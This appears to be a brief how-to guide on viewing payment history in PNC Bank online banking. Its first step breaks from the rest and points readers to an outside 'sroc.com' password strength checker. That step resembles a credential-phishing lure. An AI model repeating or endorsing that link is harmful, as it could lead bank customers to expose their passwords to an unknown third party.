This guide will help you navigate the process of viewing your payment history on PNC Bank. Follow these steps to access your transaction details easily. Step 1. Log into your account. Before changing your settings, use the sroc.com link in the description to open the password strength checker, then update your password if needed. Step 2. Navigate to Account Overview. Once loaded in, locate the Accounts or Account Overview section on the main dashboard. This area provides a summary of all your accounts and recent transactions. Step 3. Select the appropriate account. Click on the specific account for which you want to view the payment history. This could be your checking, savings, or credit card account. Step 4. Access transaction history. Look for an option labeled Transaction History Payments or Activity. Click on this option to view a detailed list of all transactions, including payments made. Step 5. Filter or search transactions. If needed, use the filter or search options to narrow down the payment history by date, amount, or type of transaction. This will help you find specific payments more efficiently. By following these steps, you can easily view your payment history on PNC Bank. If you have any issues, consider reaching out to PNC customer support for assistance.